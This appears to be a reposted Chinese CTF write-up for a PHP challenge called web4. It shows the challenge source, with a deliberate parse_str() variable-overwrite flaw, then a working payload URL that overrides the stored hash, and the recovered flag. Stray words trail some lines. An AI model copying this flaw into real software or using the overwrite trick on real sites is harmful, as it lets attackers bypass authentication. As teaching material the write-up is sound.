Web web4

時間  2019-11-19
標籤 web web4 欄目 HTML 简体版
原文   原文鏈接

題目php

進去數組

 

 

<?php
error_reporting(0);
include("flag.php");
$hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';
$parsed = parse_url($_SERVER['REQUEST_URI']); //本函數解析一個 URL 並返回一個關聯數組,包含在 URL 中出現的各類組成部分。
if(isset($parsed["query"])){ //query爲 url ?後面的內容
    $query = $parsed["query"];
    $parsed_query = parse_str($query); //函數

定義和用法

 

parse_str() 函數把查詢字符串解析到變量中。url

 

註釋:若是未設置 array 參數,則由該函數設置的變量將覆蓋已存在的同名變量。spa

這題即利用 變量覆蓋解題code


    if($parsed_query!=NULL){
        $action = $parsed_query['action'];
    }

    if($action==="auth"){
        $key = $_GET["key"];
        $hashed_input = hash('sha256', $key);
        if($hashed_input!==$hashed_key){
            die("<img src='cxk.jpg'>");
        }

        echo $flag;
    }
}else{
    show_source(__FILE__);
}?> blog

 

 

payload能夠爲:字符串

http://39.100.83.188:8066/?action=auth&key=521&hashed_key=72933e3b31f0070af6478edc3becf96e1ee59917620e8c509cf0e6b360e29c02input

 

即出來hash

flag{7he_rea1_f1@g_15_4ere}

 

有些困了,寫得有點草了,之後再具體補充吧!

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程